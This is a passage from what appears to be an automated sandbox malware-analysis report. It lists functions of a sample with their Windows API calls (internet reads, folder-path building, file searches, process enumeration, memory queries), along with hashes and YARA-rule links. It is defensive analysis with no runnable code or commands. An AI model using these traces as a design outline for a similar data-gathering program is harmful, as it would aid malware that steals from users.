                                                                                                                                                                                                                                                  • Instruction ID: d957adc9505c80513b0cde1c3ece905e22350f590b1ec7da20b2b7239af8ad9e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4ca41eec0fa1d7cc79818e71f743f84f5a572b4498b9dcc9f9fbeb1bbbc9b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25B1F634D04B899AD701DF74DC83BE87BB5BF9A304F04A209E94427562DF70A699CB92
                                                                                                                                                                                                                                                  Function 009BAA28 Relevance: 7.7, APIs: 5, Instructions: 238stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetReadFile.WININET(00000000,?,00001000), ref: 009B9975
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetReadFile.WININET(00000000,?,00001000), ref: 009B999B
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetCloseHandle.WININET(00000000), ref: 009B99AD
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetCloseHandle.WININET(19d), ref: 009B99B7
                                                                                                                                                                                                                                                    • Part of subcall function 009C29F5: strlen.MSVCRT ref: 009C2A05
                                                                                                                                                                                                                                                    • Part of subcall function 009C29F5: memcmp.MSVCRT(?,?,00000000,?,?,?,?,009BAA4F,0042EEFC,?), ref: 009C2A2C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAAFC
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,?,?,00643A38), ref: 009BABBB
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,0042EEFC,?,?,00643A38), ref: 009BABD2
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAC3F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAC6F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleReadlstrcat$memcmpmemcpymemsetstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1268544629-0
                                                                                                                                                                                                                                                  • Opcode ID: b29940634fcf22564ac7d1ee818cb18731d4b81411fbf29b5e5a976fa2478ae7
                                                                                                                                                                                                                                                  • Instruction ID: 4d6739917824454792d73a12c3eb4f96ef82bdb76260ae647e5e38c704cc550c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b29940634fcf22564ac7d1ee818cb18731d4b81411fbf29b5e5a976fa2478ae7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9A15A34D00758ABDB10EF74DC81BEA7BBABF86304F00551CE48157692DB74A78ACB52
                                                                                                                                                                                                                                                  Function 009C3412 Relevance: 7.6, APIs: 5, Instructions: 138stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 009C3421
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 009C343F
                                                                                                                                                                                                                                                    • Part of subcall function 009C3239: strlen.MSVCRT ref: 009C3245
                                                                                                                                                                                                                                                    • Part of subcall function 009C3239: strlen.MSVCRT ref: 009C3309
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C345E
                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 009C349D
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,00000000), ref: 009C3596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtualmemset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3264498718-0
                                                                                                                                                                                                                                                  • Opcode ID: 5cc64e3c8934bb9a3db4e7b4f6afa127b878f4d69c6ab6e7b030b3a716f9e9fb
                                                                                                                                                                                                                                                  • Instruction ID: 476a049c903590a503ee74c2d6f7cd9663f1bf36d4f38b4b45e625b786df6818
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cc64e3c8934bb9a3db4e7b4f6afa127b878f4d69c6ab6e7b030b3a716f9e9fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3418C71A08340ABD7189E59DC85F2BB7EAEBC8700F04C92DF58A87351EA75ED008B52
                                                                                                                                                                                                                                                  Function 009C96D1 Relevance: 7.6, APIs: 6, Instructions: 129stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C971F
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9756
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9764
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9771
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C977B
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9788
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C92FC: GetProcessHeap.KERNEL32 ref: 009C930E
                                                                                                                                                                                                                                                    • Part of subcall function 009C92FC: FindFirstFileA.KERNEL32(?,?), ref: 009C936A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$FileFindFirstFolderHeapPathProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1841389222-0
                                                                                                                                                                                                                                                  • Opcode ID: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
                                                                                                                                                                                                                                                  • Instruction ID: 016fd30d8803b9981a70081b0afacd2d3419147125488f19a11f6513249c5446
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51418172D00A59ABCB11EBA0DC56FEE77BDAFC9300B00951DF64653052DB34A785CBA2
                                                                                                                                                                                                                                                  Function 0041FB48 Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041FB8B
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041FBBC
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041FBF0
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041FC00
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041FC32
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Pointer$ReadTime$HandleInformationLocalSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4216084854-0
                                                                                                                                                                                                                                                  • Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction ID: aeb9a57c7c30a851f1939dbb9e5bce1d4e0d01877bf27b1033796e67ae6ef790
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31BDB1504744AFD714CB39C849AA7B7E8FF88704F404A3EF48AC6651E774E546CB20
                                                                                                                                                                                                                                                  Function 009CFDAF Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 009CFDF2
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 009CFE23
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 009CFE57
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 009CFE67
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFE99
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CF9E6
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CFA2A
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA46
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA67
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA9C
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFAB0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Pointer$Time$HandleInformationLocalReadSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4169386603-0
                                                                                                                                                                                                                                                  • Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction ID: 8f8bc88713e6a11d2d7971899d8edb593e797a56805af4a8b6532a40feef3941
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD3189B1900745AFE724CB29C859F67B7E9EF88304F104A2DF48AC6651E771E545CB21
                                                                                                                                                                                                                                                  Function 0041F988 Relevance: 7.6, APIs: 5, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9AA
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9BC
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9CD
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA11
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA2D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                  • Opcode ID: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
                                                                                                                                                                                                                                                  • Instruction ID: b713b32a0073a46aa718fb7c2f3049b9c34ab46680d856e50a716b5dcd1ad319
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A621B6F1A00655BBD220DA25D984F97BB5CFF14394B54012BE80987A01D73CF8AAC7E9
                                                                                                                                                                                                                                                  Function 009BB0D4 Relevance: 7.6, APIs: 5, Instructions: 75memoryfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 009BB11C
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 009BB13F
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 009BB160
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(EC8350EC), ref: 009BB17F
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009BB186
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileLocal$AllocCloseFreeHandleReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2363778996-0
                                                                                                                                                                                                                                                  • Opcode ID: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
                                                                                                                                                                                                                                                  • Instruction ID: 156785dcf50a9219eeb7cebb2954d68baf8988f236fd5683c9e6811fe0081fbf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18218E76604700AFC710DF69DC45A5AB7FAFF89320F009919E996C72A0DBB0E945CB51
                                                                                                                                                                                                                                                  Function 009C4793 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0042EEFC,?,?,?,?,?,00644AE0,?,?,00644A23,?,?,?,?), ref: 009C47BE
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 009C47C8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C47D8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C483B
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C4846
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2673430994-0
                                                                                                                                                                                                                                                  • Opcode ID: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
                                                                                                                                                                                                                                                  • Instruction ID: 606252c381bc4a0b36451eb4f6b7229d0a07c4348530803b147293a1f95fb9ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1110434B003546BE7106B219C9AF7F3E6DDFC2B68F00A41DF54582182DF798914C362
                                                                                                                                                                                                                                                  Function 009C485B Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 009C486A
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 009C4875
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 009C4880
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009C488A
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,009C751A,?,?,?,00644AC5,?,?,00644A23,?,?,00000000,?,?,00644AB8,?), ref: 009C4896
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDevice$CreateHeapProcessRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2515617246-0
                                                                                                                                                                                                                                                  • Opcode ID: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
                                                                                                                                                                                                                                                  • Instruction ID: f32062cfc531596e725e8258386aa3d5264975d5ef7af7a231ccb4d18609a619
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC015E79641214BFE3209B61BC4AF573EAFEB63B91F012014FA0583261DEA51C1487A1
                                                                                                                                                                                                                                                  Function 00414A80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,0000000A,004150C3,00000000,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A86
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000000FA,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A94
                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00414AA3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
